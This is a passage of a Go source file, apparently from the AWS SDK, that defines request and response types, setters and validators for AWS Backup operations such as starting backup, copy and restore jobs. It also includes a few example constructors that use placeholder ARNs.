// SetRecoveryPointTags sets the RecoveryPointTags field's value.
func (s *RuleInput) SetRecoveryPointTags(v map[string]*string) *RuleInput {
s.RecoveryPointTags = v
return s
}
// SetRuleName sets the RuleName field's value.
func (s *RuleInput) SetRuleName(v string) *RuleInput {
s.RuleName = &v
return s
}
// SetScheduleExpression sets the ScheduleExpression field's value.
func (s *RuleInput) SetScheduleExpression(v string) *RuleInput {
s.ScheduleExpression = &v
return s
}
// SetStartWindowMinutes sets the StartWindowMinutes field's value.
func (s *RuleInput) SetStartWindowMinutes(v int64) *RuleInput {
s.StartWindowMinutes = &v
return s
}
// SetTargetBackupVaultName sets the TargetBackupVaultName field's value.
func (s *RuleInput) SetTargetBackupVaultName(v string) *RuleInput {
s.TargetBackupVaultName = &v
return s
}
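// Illustrative sketch (not generated API surface): a RuleInput whose lifecycle
// honors the constraint documented above, with DeleteAfterDays at least 90 days
// greater than MoveToColdStorageAfterDays. The rule name, vault name, and cron
// expression are hypothetical; Lifecycle and its setters are assumed to be
// defined earlier in this file.
func exampleRuleInput() (*RuleInput, error) {
	lifecycle := (&Lifecycle{}).
		SetMoveToColdStorageAfterDays(30).
		SetDeleteAfterDays(120) // 120 - 30 >= 90 satisfies the cold-storage rule
	rule := (&RuleInput{}).
		SetRuleName("daily-backups").
		SetTargetBackupVaultName("example-vault").
		SetScheduleExpression("cron(0 5 ? * * *)").
		SetLifecycle(lifecycle)
	// Validate enforces RuleName and TargetBackupVaultName and recurses into
	// any CopyActions.
	if err := rule.Validate(); err != nil {
		return nil, err
	}
	return rule, nil
}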
// Used to specify a set of resources to a backup plan.
type Selection struct {
_ struct{} `type:"structure"`
// The ARN of the IAM role that AWS Backup uses to authenticate when backing
// up the target resource; for example, arn:aws:iam::123456789012:role/S3Access.
//
// IamRoleArn is a required field
IamRoleArn *string `type:"string" required:"true"`
// An array of conditions used to specify a set of resources to assign to a
// backup plan; for example, "StringEquals": {"ec2:ResourceTag/Department":
// "accounting"}. Assigns the backup plan to every resource with at least one
// matching tag.
ListOfTags []*Condition `type:"list"`
// An array of strings that contain Amazon Resource Names (ARNs) of resources
// to assign to a backup plan.
Resources []*string `type:"list"`
// The display name of a resource selection document.
//
// SelectionName is a required field
SelectionName *string `type:"string" required:"true"`
}
// String returns the string representation
func (s Selection) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s Selection) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *Selection) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "Selection"}
if s.IamRoleArn == nil {
invalidParams.Add(request.NewErrParamRequired("IamRoleArn"))
}
if s.SelectionName == nil {
invalidParams.Add(request.NewErrParamRequired("SelectionName"))
}
if s.ListOfTags != nil {
for i, v := range s.ListOfTags {
if v == nil {
continue
}
if err := v.Validate(); err != nil {
invalidParams.AddNested(fmt.Sprintf("%s[%v]", "ListOfTags", i), err.(request.ErrInvalidParams))
}
}
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetIamRoleArn sets the IamRoleArn field's value.
func (s *Selection) SetIamRoleArn(v string) *Selection {
s.IamRoleArn = &v
return s
}
// SetListOfTags sets the ListOfTags field's value.
func (s *Selection) SetListOfTags(v []*Condition) *Selection {
s.ListOfTags = v
return s
}
// SetResources sets the Resources field's value.
func (s *Selection) SetResources(v []*string) *Selection {
s.Resources = v
return s
}
// SetSelectionName sets the SelectionName field's value.
func (s *Selection) SetSelectionName(v string) *Selection {
s.SelectionName = &v
return s
}
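// Illustrative sketch (not generated API surface): assigning resources to a
// backup plan by ARN rather than by tag condition. The role ARN, selection
// name, and volume ARN are hypothetical placeholders.
func exampleSelection() (*Selection, error) {
	volumeArn := "arn:aws:ec2:us-east-1:123456789012:volume/vol-0123456789abcdef0"
	sel := (&Selection{}).
		SetIamRoleArn("arn:aws:iam::123456789012:role/S3Access").
		SetSelectionName("ebs-volumes").
		SetResources([]*string{&volumeArn})
	if err := sel.Validate(); err != nil {
		return nil, err
	}
	return sel, nil
}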
// Contains metadata about a BackupSelection object.
type SelectionsListMember struct {
_ struct{} `type:"structure"`
// Uniquely identifies a backup plan.
BackupPlanId *string `type:"string"`
// The date and time a backup plan is created, in Unix format and Coordinated
// Universal Time (UTC). The value of CreationDate is accurate to milliseconds.
// For example, the value 1516925490.087 represents Friday, January 26, 2018
// 12:11:30.087 AM.
CreationDate *time.Time `type:"timestamp"`
// A unique string that identifies the request and allows failed requests to
// be retried without the risk of running the operation twice.
CreatorRequestId *string `type:"string"`
// Specifies the IAM role Amazon Resource Name (ARN) used to create the target
// recovery point; for example, arn:aws:iam::123456789012:role/S3Access.
IamRoleArn *string `type:"string"`
// Uniquely identifies a request to assign a set of resources to a backup plan.
SelectionId *string `type:"string"`
// The display name of a resource selection document.
SelectionName *string `type:"string"`
}
// String returns the string representation
func (s SelectionsListMember) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s SelectionsListMember) GoString() string {
return s.String()
}
// SetBackupPlanId sets the BackupPlanId field's value.
func (s *SelectionsListMember) SetBackupPlanId(v string) *SelectionsListMember {
s.BackupPlanId = &v
return s
}
// SetCreationDate sets the CreationDate field's value.
func (s *SelectionsListMember) SetCreationDate(v time.Time) *SelectionsListMember {
s.CreationDate = &v
return s
}
// SetCreatorRequestId sets the CreatorRequestId field's value.
func (s *SelectionsListMember) SetCreatorRequestId(v string) *SelectionsListMember {
s.CreatorRequestId = &v
return s
}
// SetIamRoleArn sets the IamRoleArn field's value.
func (s *SelectionsListMember) SetIamRoleArn(v string) *SelectionsListMember {
s.IamRoleArn = &v
return s
}
// SetSelectionId sets the SelectionId field's value.
func (s *SelectionsListMember) SetSelectionId(v string) *SelectionsListMember {
s.SelectionId = &v
return s
}
// SetSelectionName sets the SelectionName field's value.
func (s *SelectionsListMember) SetSelectionName(v string) *SelectionsListMember {
s.SelectionName = &v
return s
}
// The request failed due to a temporary failure of the server.
type ServiceUnavailableException struct {
_ struct{} `type:"structure"`
RespMetadata protocol.ResponseMetadata `json:"-" xml:"-"`
Code_ *string `locationName:"Code" type:"string"`
Context *string `type:"string"`
Message_ *string `locationName:"Message" type:"string"`
Type *string `type:"string"`
}
// String returns the string representation
func (s ServiceUnavailableException) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s ServiceUnavailableException) GoString() string {
return s.String()
}
func newErrorServiceUnavailableException(v protocol.ResponseMetadata) error {
return &ServiceUnavailableException{
RespMetadata: v,
}
}
// Code returns the exception type name.
func (s *ServiceUnavailableException) Code() string {
return "ServiceUnavailableException"
}
// Message returns the exception's message.
func (s *ServiceUnavailableException) Message() string {
if s.Message_ != nil {
return *s.Message_
}
return ""
}
// OrigErr always returns nil, satisfies awserr.Error interface.
func (s *ServiceUnavailableException) OrigErr() error {
return nil
}
func (s *ServiceUnavailableException) Error() string {
return fmt.Sprintf("%s: %s\n%s", s.Code(), s.Message(), s.String())
}
// StatusCode returns the HTTP status code for the request's response error.
func (s *ServiceUnavailableException) StatusCode() int {
return s.RespMetadata.StatusCode
}
// RequestID returns the service's response RequestID for request.
func (s *ServiceUnavailableException) RequestID() string {
return s.RespMetadata.RequestID
}
type StartBackupJobInput struct {
_ struct{} `type:"structure"`
// Specifies the backup option for a selected resource. This option is only
// available for Windows VSS backup jobs.
//
// Valid values: Set to "WindowsVSS":"enabled" to enable the WindowsVSS backup
// option and create a VSS Windows backup. Set to "WindowsVSS":"disabled"
// to create a regular backup. The WindowsVSS option is not enabled by default.
BackupOptions map[string]*string `type:"map"`
// The name of a logical container where backups are stored. Backup vaults are
// identified by names that are unique to the account used to create them and
// the AWS Region where they are created. They consist of lowercase letters,
// numbers, and hyphens.
//
// BackupVaultName is a required field
BackupVaultName *string `type:"string" required:"true"`
// A value in minutes during which a successfully started backup must complete,
// or else AWS Backup will cancel the job. This value is optional. The countdown
// begins when the backup was scheduled; it is not extended by StartWindowMinutes
// or by a backup that started later than scheduled.
CompleteWindowMinutes *int64 `type:"long"`
// Specifies the IAM role ARN used to create the target recovery point; for
// example, arn:aws:iam::123456789012:role/S3Access.
//
// IamRoleArn is a required field
IamRoleArn *string `type:"string" required:"true"`
// A customer-chosen string that can be used to distinguish between calls to
// StartBackupJob.
IdempotencyToken *string `type:"string"`
// The lifecycle defines when a protected resource is transitioned to cold storage
// and when it expires. AWS Backup will transition and expire backups automatically
// according to the lifecycle that you define.
//
// Backups transitioned to cold storage must be stored in cold storage for a
// minimum of 90 days. Therefore, the “expire after days” setting must be
// 90 days greater than the “transition to cold after days” setting. The
// “transition to cold after days” setting cannot be changed after a backup
// has been transitioned to cold.
//
// Only Amazon EFS file system backups can be transitioned to cold storage.
Lifecycle *Lifecycle `type:"structure"`
// To help organize your resources, you can assign your own metadata to the
// resources that you create. Each tag is a key-value pair.
RecoveryPointTags map[string]*string `type:"map" sensitive:"true"`
// An Amazon Resource Name (ARN) that uniquely identifies a resource. The format
// of the ARN depends on the resource type.
//
// ResourceArn is a required field
ResourceArn *string `type:"string" required:"true"`
// A value in minutes after a backup is scheduled before a job will be canceled
// if it doesn't start successfully. This value is optional, and the default
// is 8 hours.
StartWindowMinutes *int64 `type:"long"`
}
// String returns the string representation
func (s StartBackupJobInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s StartBackupJobInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *StartBackupJobInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "StartBackupJobInput"}
if s.BackupVaultName == nil {
invalidParams.Add(request.NewErrParamRequired("BackupVaultName"))
}
if s.IamRoleArn == nil {
invalidParams.Add(request.NewErrParamRequired("IamRoleArn"))
}
if s.ResourceArn == nil {
invalidParams.Add(request.NewErrParamRequired("ResourceArn"))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetBackupOptions sets the BackupOptions field's value.
func (s *StartBackupJobInput) SetBackupOptions(v map[string]*string) *StartBackupJobInput {
s.BackupOptions = v
return s
}
// SetBackupVaultName sets the BackupVaultName field's value.
func (s *StartBackupJobInput) SetBackupVaultName(v string) *StartBackupJobInput {
s.BackupVaultName = &v
return s
}
// SetCompleteWindowMinutes sets the CompleteWindowMinutes field's value.
func (s *StartBackupJobInput) SetCompleteWindowMinutes(v int64) *StartBackupJobInput {
s.CompleteWindowMinutes = &v
return s
}
// SetIamRoleArn sets the IamRoleArn field's value.
func (s *StartBackupJobInput) SetIamRoleArn(v string) *StartBackupJobInput {
s.IamRoleArn = &v
return s
}
// SetIdempotencyToken sets the IdempotencyToken field's value.
func (s *StartBackupJobInput) SetIdempotencyToken(v string) *StartBackupJobInput {
s.IdempotencyToken = &v
return s
}
// SetLifecycle sets the Lifecycle field's value.
func (s *StartBackupJobInput) SetLifecycle(v *Lifecycle) *StartBackupJobInput {
s.Lifecycle = v
return s
}
// SetRecoveryPointTags sets the RecoveryPointTags field's value.
func (s *StartBackupJobInput) SetRecoveryPointTags(v map[string]*string) *StartBackupJobInput {
s.RecoveryPointTags = v
return s
}
// SetResourceArn sets the ResourceArn field's value.
func (s *StartBackupJobInput) SetResourceArn(v string) *StartBackupJobInput {
s.ResourceArn = &v
return s
}
// SetStartWindowMinutes sets the StartWindowMinutes field's value.
func (s *StartBackupJobInput) SetStartWindowMinutes(v int64) *StartBackupJobInput {
s.StartWindowMinutes = &v
return s
}
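// Illustrative sketch (not generated API surface): starting an EC2 backup with
// the Windows VSS option described above. The vault name, role ARN, and
// instance ARN are hypothetical placeholders.
func exampleStartBackupJobInput() (*StartBackupJobInput, error) {
	enabled := "enabled"
	input := (&StartBackupJobInput{}).
		SetBackupVaultName("example-vault").
		SetIamRoleArn("arn:aws:iam::123456789012:role/S3Access").
		SetResourceArn("arn:aws:ec2:us-east-1:123456789012:instance/i-0123456789abcdef0").
		SetBackupOptions(map[string]*string{"WindowsVSS": &enabled})
	if err := input.Validate(); err != nil {
		return nil, err
	}
	return input, nil
}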
type StartBackupJobOutput struct {
_ struct{} `type:"structure"`
// Uniquely identifies a request to AWS Backup to back up a resource.
BackupJobId *string `type:"string"`
// The date and time that a backup job is created, in Unix format and Coordinated
// Universal Time (UTC). The value of CreationDate is accurate to milliseconds.
// For example, the value 1516925490.087 represents Friday, January 26, 2018
// 12:11:30.087 AM.
CreationDate *time.Time `type:"timestamp"`
// An ARN that uniquely identifies a recovery point; for example, arn:aws:backup:us-east-1:123456789012:recovery-point:1EB3B5E7-9EB0-435A-A80B-108B488B0D45.
RecoveryPointArn *string `type:"string"`
}
// String returns the string representation
func (s StartBackupJobOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s StartBackupJobOutput) GoString() string {
return s.String()
}
// SetBackupJobId sets the BackupJobId field's value.
func (s *StartBackupJobOutput) SetBackupJobId(v string) *StartBackupJobOutput {
s.BackupJobId = &v
return s
}
// SetCreationDate sets the CreationDate field's value.
func (s *StartBackupJobOutput) SetCreationDate(v time.Time) *StartBackupJobOutput {
s.CreationDate = &v
return s
}
// SetRecoveryPointArn sets the RecoveryPointArn field's value.
func (s *StartBackupJobOutput) SetRecoveryPointArn(v string) *StartBackupJobOutput {
s.RecoveryPointArn = &v
return s
}
type StartCopyJobInput struct {
_ struct{} `type:"structure"`
// An Amazon Resource Name (ARN) that uniquely identifies a destination backup
// vault to copy to; for example, arn:aws:backup:us-east-1:123456789012:vault:aBackupVault.
//
// DestinationBackupVaultArn is a required field
DestinationBackupVaultArn *string `type:"string" required:"true"`
// Specifies the IAM role ARN used to copy the target recovery point; for example,
// arn:aws:iam::123456789012:role/S3Access.
//
// IamRoleArn is a required field
IamRoleArn *string `type:"string" required:"true"`
// A customer-chosen string that can be used to distinguish between calls to
// StartCopyJob.
IdempotencyToken *string `type:"string"`
// Contains an array of Transition objects specifying how long in days before
// a recovery point transitions to cold storage or is deleted.
//
// Backups transitioned to cold storage must be stored in cold storage for a
// minimum of 90 days. Therefore, on the console, the “expire after days”
// setting must be 90 days greater than the “transition to cold after days”
// setting. The “transition to cold after days” setting cannot be changed
// after a backup has been transitioned to cold.
//
// Only Amazon EFS file system backups can be transitioned to cold storage.
Lifecycle *Lifecycle `type:"structure"`
// An ARN that uniquely identifies a recovery point to use for the copy job;
// for example, arn:aws:backup:us-east-1:123456789012:recovery-point:1EB3B5E7-9EB0-435A-A80B-108B488B0D45.
//
// RecoveryPointArn is a required field
RecoveryPointArn *string `type:"string" required:"true"`
// The name of a logical source container where backups are stored. Backup vaults
// are identified by names that are unique to the account used to create them
// and the AWS Region where they are created. They consist of lowercase letters,
// numbers, and hyphens.
//
// SourceBackupVaultName is a required field
SourceBackupVaultName *string `type:"string" required:"true"`
}
// String returns the string representation
func (s StartCopyJobInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s StartCopyJobInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *StartCopyJobInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "StartCopyJobInput"}
if s.DestinationBackupVaultArn == nil {
invalidParams.Add(request.NewErrParamRequired("DestinationBackupVaultArn"))
}
if s.IamRoleArn == nil {
invalidParams.Add(request.NewErrParamRequired("IamRoleArn"))
}
if s.RecoveryPointArn == nil {
invalidParams.Add(request.NewErrParamRequired("RecoveryPointArn"))
}
if s.SourceBackupVaultName == nil {
invalidParams.Add(request.NewErrParamRequired("SourceBackupVaultName"))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetDestinationBackupVaultArn sets the DestinationBackupVaultArn field's value.
func (s *StartCopyJobInput) SetDestinationBackupVaultArn(v string) *StartCopyJobInput {
s.DestinationBackupVaultArn = &v
return s
}
// SetIamRoleArn sets the IamRoleArn field's value.
func (s *StartCopyJobInput) SetIamRoleArn(v string) *StartCopyJobInput {
s.IamRoleArn = &v
return s
}
// SetIdempotencyToken sets the IdempotencyToken field's value.
func (s *StartCopyJobInput) SetIdempotencyToken(v string) *StartCopyJobInput {
s.IdempotencyToken = &v
return s
}
// SetLifecycle sets the Lifecycle field's value.
func (s *StartCopyJobInput) SetLifecycle(v *Lifecycle) *StartCopyJobInput {
s.Lifecycle = v
return s
}
// SetRecoveryPointArn sets the RecoveryPointArn field's value.
func (s *StartCopyJobInput) SetRecoveryPointArn(v string) *StartCopyJobInput {
s.RecoveryPointArn = &v
return s
}
// SetSourceBackupVaultName sets the SourceBackupVaultName field's value.
func (s *StartCopyJobInput) SetSourceBackupVaultName(v string) *StartCopyJobInput {
s.SourceBackupVaultName = &v
return s
}
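// Illustrative sketch (not generated API surface): copying a recovery point
// into a second vault. All names and ARNs are hypothetical, patterned on the
// field documentation above.
func exampleStartCopyJobInput() (*StartCopyJobInput, error) {
	input := (&StartCopyJobInput{}).
		SetSourceBackupVaultName("example-vault").
		SetDestinationBackupVaultArn("arn:aws:backup:us-east-1:123456789012:vault:aBackupVault").
		SetIamRoleArn("arn:aws:iam::123456789012:role/S3Access").
		SetRecoveryPointArn("arn:aws:backup:us-east-1:123456789012:recovery-point:1EB3B5E7-9EB0-435A-A80B-108B488B0D45")
	if err := input.Validate(); err != nil {
		return nil, err
	}
	return input, nil
}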
type StartCopyJobOutput struct {
_ struct{} `type:"structure"`
// Uniquely identifies a copy job.
CopyJobId *string `type:"string"`
// The date and time that a copy job is created, in Unix format and Coordinated
// Universal Time (UTC). The value of CreationDate is accurate to milliseconds.
// For example, the value 1516925490.087 represents Friday, January 26, 2018
// 12:11:30.087 AM.
CreationDate *time.Time `type:"timestamp"`
}
// String returns the string representation
func (s StartCopyJobOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s StartCopyJobOutput) GoString() string {
return s.String()
}
// SetCopyJobId sets the CopyJobId field's value.
func (s *StartCopyJobOutput) SetCopyJobId(v string) *StartCopyJobOutput {
s.CopyJobId = &v
return s
}
// SetCreationDate sets the CreationDate field's value.
func (s *StartCopyJobOutput) SetCreationDate(v time.Time) *StartCopyJobOutput {
s.CreationDate = &v
return s
}
type StartRestoreJobInput struct {
_ struct{} `type:"structure"`
// The Amazon Resource Name (ARN) of the IAM role that AWS Backup uses to create
// the target recovery point; for example, arn:aws:iam::123456789012:role/S3Access.
//
// IamRoleArn is a required field
IamRoleArn *string `type:"string" required:"true"`
// A customer-chosen string that can be used to distinguish between calls to
// StartRestoreJob.
IdempotencyToken *string `type:"string"`
// A set of metadata key-value pairs. Contains information, such as a resource
// name, required to restore a recovery point.
//
// You can get configuration metadata about a resource at the time it was backed
// up by calling GetRecoveryPointRestoreMetadata. However, values in addition
// to those provided by GetRecoveryPointRestoreMetadata might be required to
// restore a resource. For example, you might need to provide a new resource
// name if the original already exists.
//
// You need to specify specific metadata to restore an Amazon Elastic File System
// (Amazon EFS) instance:
//
// * file-system-id: The ID of the Amazon EFS file system that is backed
// up by AWS Backup. Returned in GetRecoveryPointRestoreMetadata.
//
// * Encrypted: A Boolean value that, if true, specifies that the file system
// is encrypted. If KmsKeyId is specified, Encrypted must be set to true.
//
// * KmsKeyId: Specifies the AWS KMS key that is used to encrypt the restored
// file system. You can specify a key from another AWS account, provided that
// it is properly shared with your account via AWS KMS.
//
// * PerformanceMode: Specifies the throughput mode of the file system.
//
// * CreationToken: A user-supplied value that ensures the uniqueness (idempotency)
// of the request.
//
// * newFileSystem: A Boolean value that, if true, specifies that the recovery
// point is restored to a new Amazon EFS file system.
//
// * ItemsToRestore: An array of one to five strings where each string is
// a file path. Use ItemsToRestore to restore specific files or directories
// rather than the entire file system. This parameter is optional. For example,
// "itemsToRestore":"[\"/my.test\"]".
//
// Metadata is a required field
Metadata map[string]*string `type:"map" required:"true" sensitive:"true"`
// An ARN that uniquely identifies a recovery point; for example, arn:aws:backup:us-east-1:123456789012:recovery-point:1EB3B5E7-9EB0-435A-A80B-108B488B0D45.
//
// RecoveryPointArn is a required field
RecoveryPointArn *string `type:"string" required:"true"`
// Starts a job to restore a recovery point for one of the following resources:
//
// * DynamoDB for Amazon DynamoDB
//
// * EBS for Amazon Elastic Block Store
//
// * EC2 for Amazon Elastic Compute Cloud
//
// * EFS for Amazon Elastic File System
//
// * RDS for Amazon Relational Database Service
//
// * Aurora for Amazon Aurora
//
// * Storage Gateway for AWS Storage Gateway
ResourceType *string `type:"string"`
}
// String returns the string representation
func (s StartRestoreJobInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s StartRestoreJobInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *StartRestoreJobInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "StartRestoreJobInput"}
if s.IamRoleArn == nil {
invalidParams.Add(request.NewErrParamRequired("IamRoleArn"))
}
if s.Metadata == nil {
invalidParams.Add(request.NewErrParamRequired("Metadata"))
}
if s.RecoveryPointArn == nil {
invalidParams.Add(request.NewErrParamRequired("RecoveryPointArn"))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetIamRoleArn sets the IamRoleArn field's value.
func (s *StartRestoreJobInput) SetIamRoleArn(v string) *StartRestoreJobInput {
s.IamRoleArn = &v
return s
}
// SetIdempotencyToken sets the IdempotencyToken field's value.
func (s *StartRestoreJobInput) SetIdempotencyToken(v string) *StartRestoreJobInput {
s.IdempotencyToken = &v
return s
}
// SetMetadata sets the Metadata field's value.
func (s *StartRestoreJobInput) SetMetadata(v map[string]*string) *StartRestoreJobInput {
s.Metadata = v
return s
}
// SetRecoveryPointArn sets the RecoveryPointArn field's value.
func (s *StartRestoreJobInput) SetRecoveryPointArn(v string) *StartRestoreJobInput {
s.RecoveryPointArn = &v
return s
}
// SetResourceType sets the ResourceType field's value.
func (s *StartRestoreJobInput) SetResourceType(v string) *StartRestoreJobInput {
s.ResourceType = &v
return s
}
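// Illustrative sketch (not generated API surface): restoring an EFS recovery
// point to a new file system using the metadata keys enumerated above. The IDs
// and ARNs are hypothetical; in practice, start from the output of
// GetRecoveryPointRestoreMetadata and override only what must change.
func exampleStartRestoreJobInput() (*StartRestoreJobInput, error) {
	fileSystemID := "fs-0123456789abcdef0"
	newFileSystem := "true"
	input := (&StartRestoreJobInput{}).
		SetIamRoleArn("arn:aws:iam::123456789012:role/S3Access").
		SetRecoveryPointArn("arn:aws:backup:us-east-1:123456789012:recovery-point:1EB3B5E7-9EB0-435A-A80B-108B488B0D45").
		SetMetadata(map[string]*string{
			"file-system-id": &fileSystemID,
			"newFileSystem":  &newFileSystem,
		})
	if err := input.Validate(); err != nil {
		return nil, err
	}
	return input, nil
}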
type StartRestoreJobOutput struct {
_ struct{} `type:"structure"`
// Uniquely identifies the job that restores a recovery point.
RestoreJobId *string `type:"string"`
}
// String returns the string representation
func (s StartRestoreJobOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s StartRestoreJobOutput) GoString() string {
return s.String()
}
// SetRestoreJobId sets the RestoreJobId field's value.
func (s *StartRestoreJobOutput) SetRestoreJobId(v string) *StartRestoreJobOutput {
s.RestoreJobId = &v
return s
}
type StopBackupJobInput struct {
_ struct{} `type:"structure"`
// Uniquely identifies a request to AWS Backup to back up a resource.
//
// BackupJobId is a required field
BackupJobId *string `location:"uri" locationName:"backupJobId" type:"string" required:"true"`
}
// String returns the string representation
func (s StopBackupJobInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s StopBackupJobInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *StopBackupJobInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "StopBackupJobInput"}
if s.BackupJobId == nil {
invalidParams.Add(request.NewErrParamRequired("BackupJobId"))
}
if s.BackupJobId != nil && len(*s.BackupJobId) < 1 {
invalidParams.Add(request.NewErrParamMinLen("BackupJobId", 1))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetBackupJobId sets the BackupJobId field's value.
func (s *StopBackupJobInput) SetBackupJobId(v string) *StopBackupJobInput {
s.BackupJobId = &v
return s
}
type StopBackupJobOutput struct {
_ struct{} `type:"structure"`
}
// String returns the string representation
func (s StopBackupJobOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s StopBackupJobOutput) GoString() string {
return s.String()
}
type TagResourceInput struct {
_ struct{} `type:"structure"`
// An ARN that uniquely identifies a resource. The format of the ARN depends
// on the type of the tagged resource.
//
// ResourceArn is a required field
ResourceArn *string `location:"uri" locationName:"resourceArn" type:"string" required:"true"`
// Key-value pairs that are used to help organize your resources. You can assign
// your own metadata to the resources you create.
//
// Tags is a required field
Tags map[string]*string `type:"map" required:"true" sensitive:"true"`
}
// String returns the string representation
func (s TagResourceInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s TagResourceInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *TagResourceInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "TagResourceInput"}
if s.ResourceArn == nil {
invalidParams.Add(request.NewErrParamRequired("ResourceArn"))
}
if s.ResourceArn != nil && len(*s.ResourceArn) < 1 {
invalidParams.Add(request.NewErrParamMinLen("ResourceArn", 1))
}
if s.Tags == nil {
invalidParams.Add(request.NewErrParamRequired("Tags"))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetResourceArn sets the ResourceArn field's value.
func (s *TagResourceInput) SetResourceArn(v string) *TagResourceInput {
s.ResourceArn = &v
return s
}
// SetTags sets the Tags field's value.
func (s *TagResourceInput) SetTags(v map[string]*string) *TagResourceInput {
s.Tags = v
return s
}
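// Illustrative sketch (an assumption, not generated code): tagging a backup
// vault with the fluent setters defined above. The ARN and tag values are
// placeholders.
func exampleTagResourceInput() *TagResourceInput {
	owner := "data-platform"
	return (&TagResourceInput{}).
		SetResourceArn("arn:aws:backup:us-east-1:123456789012:vault:aBackupVault").
		SetTags(map[string]*string{"Owner": &owner})
}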
type TagResourceOutput struct {
_ struct{} `type:"structure"`
}
// String returns the string representation
func (s TagResourceOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s TagResourceOutput) GoString() string {
return s.String()
}
type UntagResourceInput struct {
_ struct{} `type:"structure"`
// An ARN that uniquely identifies a resource. The format of the ARN depends
// on the type of the tagged resource.
//
// ResourceArn is a required field
ResourceArn *string `location:"uri" locationName:"resourceArn" type:"string" required:"true"`
// A list of keys to identify which key-value tags to remove from a resource.
//
// TagKeyList is a required field
TagKeyList []*string `type:"list" required:"true" sensitive:"true"`
}
// String returns the string representation
func (s UntagResourceInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s UntagResourceInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *UntagResourceInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "UntagResourceInput"}
if s.ResourceArn == nil {
invalidParams.Add(request.NewErrParamRequired("ResourceArn"))
}
if s.ResourceArn != nil && len(*s.ResourceArn) < 1 {
invalidParams.Add(request.NewErrParamMinLen("ResourceArn", 1))
}
if s.TagKeyList == nil {
invalidParams.Add(request.NewErrParamRequired("TagKeyList"))
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetResourceArn sets the ResourceArn field's value.
func (s *UntagResourceInput) SetResourceArn(v string) *UntagResourceInput {
s.ResourceArn = &v
return s
}
// SetTagKeyList sets the TagKeyList field's value.
func (s *UntagResourceInput) SetTagKeyList(v []*string) *UntagResourceInput {
s.TagKeyList = v
return s
}
type UntagResourceOutput struct {
_ struct{} `type:"structure"`
}
// String returns the string representation
func (s UntagResourceOutput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s UntagResourceOutput) GoString() string {
return s.String()
}
type UpdateBackupPlanInput struct {
_ struct{} `type:"structure"`
// Specifies the body of a backup plan. Includes a BackupPlanName and one or
// more sets of Rules.
//
// BackupPlan is a required field
BackupPlan *PlanInput `type:"structure" required:"true"`
// Uniquely identifies a backup plan.
//
// BackupPlanId is a required field
BackupPlanId *string `location:"uri" locationName:"backupPlanId" type:"string" required:"true"`
}
// String returns the string representation
func (s UpdateBackupPlanInput) String() string {
return awsutil.Prettify(s)
}
// GoString returns the string representation
func (s UpdateBackupPlanInput) GoString() string {
return s.String()
}
// Validate inspects the fields of the type to determine if they are valid.
func (s *UpdateBackupPlanInput) Validate() error {
invalidParams := request.ErrInvalidParams{Context: "UpdateBackupPlanInput"}
if s.BackupPlan == nil {
invalidParams.Add(request.NewErrParamRequired("BackupPlan"))
}
if s.BackupPlanId == nil {
invalidParams.Add(request.NewErrParamRequired("BackupPlanId"))
}
if s.BackupPlanId != nil && len(*s.BackupPlanId) < 1 {
invalidParams.Add(request.NewErrParamMinLen("BackupPlanId", 1))
}
if s.BackupPlan != nil {
if err := s.BackupPlan.Validate(); err != nil {
invalidParams.AddNested("BackupPlan", err.(request.ErrInvalidParams))
}
}
if invalidParams.Len() > 0 {
return invalidParams
}
return nil
}
// SetBackupPlan sets the BackupPlan field's value.
func (s *UpdateBackupPlanInput) SetBackupPlan(v *PlanInput) *UpdateBackupPlanInput {
s.BackupPlan = v
return s
}
// SetBackupPlanId sets the BackupPlanId field's value.
func (s *UpdateBackupPlanInput) SetBackupPlanId(v string) *UpdateBackupPlanInput {
s.BackupPlanId = &v
return s
}
type UpdateBackupPlanOutput struct {
_ struct{} `type:"structure"`
// Contains a list of BackupOptions for each resource type.
AdvancedBackupSettings []*AdvancedBackupSetting `type:"list"`
// An Amazon Resource Name (ARN) that uniquely identifies a backup plan; for
// example, arn:aws:backup:us-east-1:123456789012:plan:8F81F553-3A74-4A3F-B93D-B3360DC80C50.
BackupPlanArn *string `type:"string"`
// Uniquely identifies a backup plan.
BackupPlanId *string `type:"string"`
